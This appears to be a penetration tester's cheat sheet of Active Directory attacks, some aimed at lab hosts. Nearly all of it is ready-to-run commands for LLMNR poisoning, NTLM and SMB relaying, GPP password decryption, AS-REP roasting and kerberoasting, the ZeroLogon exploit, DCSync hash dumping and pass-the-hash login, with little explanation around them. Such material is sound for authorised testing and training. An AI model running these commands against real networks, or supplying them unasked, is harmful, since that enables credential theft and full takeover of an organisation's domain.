Active Directory
Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition)
LLMNR Poisoning
LLMNR is like DNS on an internal windows network Listen for connections on wrong network drives and retrieve hashes
- https://github.com/lgandx/Responder
(Impacket toolkit required)
sudo responder.py -I eth0 -Pv
Password cracking with hashcat (NTLMv2)
hashcat -m 5600 ntlmhash.txt /usr/share/wordlists/rockyou.txt --force
Ipv6 DNS Takeover via mitm6
GitHub - fox-it/mitm6: pwning IPv4 via IPv6
mitm6 -d marvel.local
Setup relay attack
ntlmrelayx.py -6 -t ldaps://192.168.57.140 -wh fakewpad.marvel.local -l lootme
The worst of both worlds: Combining NTLM Relaying and Kerberos delegation - dirkjanm.io
SMB Relay
Relay hashes we gathered and gain access to specific machines. Relayed user credentials must be admin on machine.
Check if SMB signing is disabled. (Message signing is enabled but not required)
nmap --script=smb2-security-mode.nse -p445 192.168.57.0/24
Save relevant hosts to targets.txt
Disable smb and http on responder.conf
https://hausec.com/how-to-set-up-ntlmrelayx-py/
nano /etc/responder/Responder.conf
Start listening for events on responder (python2 and python3 Version)
sudo python responder.py -I eth0 -rdwv
sudo responder.py -I eth0 -Pv
Initialize relay
ntlmrelayx.py -tf targets.txt -smb2support
Retrieve SAM hashes
Abusing Group Policy Preferences (GPP)
Find the Groups.xml file.
\\DOMAIN\SYSVOL\domain\Policies\RANDOMOBJECTS\Machine\Preferences\Groups\Groups.xml
or
findstr /S /I cpassword \\domain.local\sysvol\domain.local\policies\*.xml
Retrieve the cpassword hash. Decrypt.
gpp-decrypt hash
Use can use the credentials with psexec.py or maybe try kerberoasting
Kerberos (AS-REP Roasting)
Run impacket/GetNPUsers.py to get the users that don't have the require pre-authentication option
GetNPUsers.py -dc-ip IP -no-pass -userfile user.txt
Crack the hashes found
Use evil-winrm to connect to the box using the credentials found
Use ntlmrelay.py from Impacket to relay any changes made to LDAP.
ntlmrelayx.py -t ldap://10.10.10.161 --escalate-user svc-alfresco
Authenticate by visiting http://localhost/privexchange (any directory will work, this is random). This sets the user ad Domain Admin.
Abusing ZeroLogon
python3 zerologon_check.py DC IP
python3 cve-2020-1472-exploit.py DC IP
Use Impacket’s secretsdump.py to perform the DCSync attack, gathering all the user hashes:
secretsdump.py -just-dc DOMAIN/DC\$@IP
secretsdump.py htb.local/user:password@10.10.10.161 -just-dc -outputfile secrets-dump.txt
Login using the Administrator hash
evil-winrm -u Administrator -i 10.10.10.161 -H '32693b11e6aa90eb43d32c72a07ceea6'
In order to find the plain password hex and restore the password
secretsdump.py administrator@IP -hashes HASH
python3 restorepassword.py DOMAIN/DC@DC_HOSTNAME -target-ip IP -hexpass HEXPASS
Kerbrute
Kerbrute is a popular enumeration tool used to brute-force and enumerate valid active-directory users by abusing the Kerberos pre-authentication.
You need to add the DNS domain name along with the machine IP to /etc/hosts inside of your attacker machine: 10.10.117.212 CONTROLLER.local
./kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt
Harvesting Tickets w/ Rubeus
On the target machine
Rubeus.exe harvest /interval:30
Rubeus.exe kerberoast
This will dump the Kerberos hash of any kerberoastable users
Dumping KRBASREP5 Hashes w/ Rubeus
Rubeus.exe asreproast
Crack the resulting hashes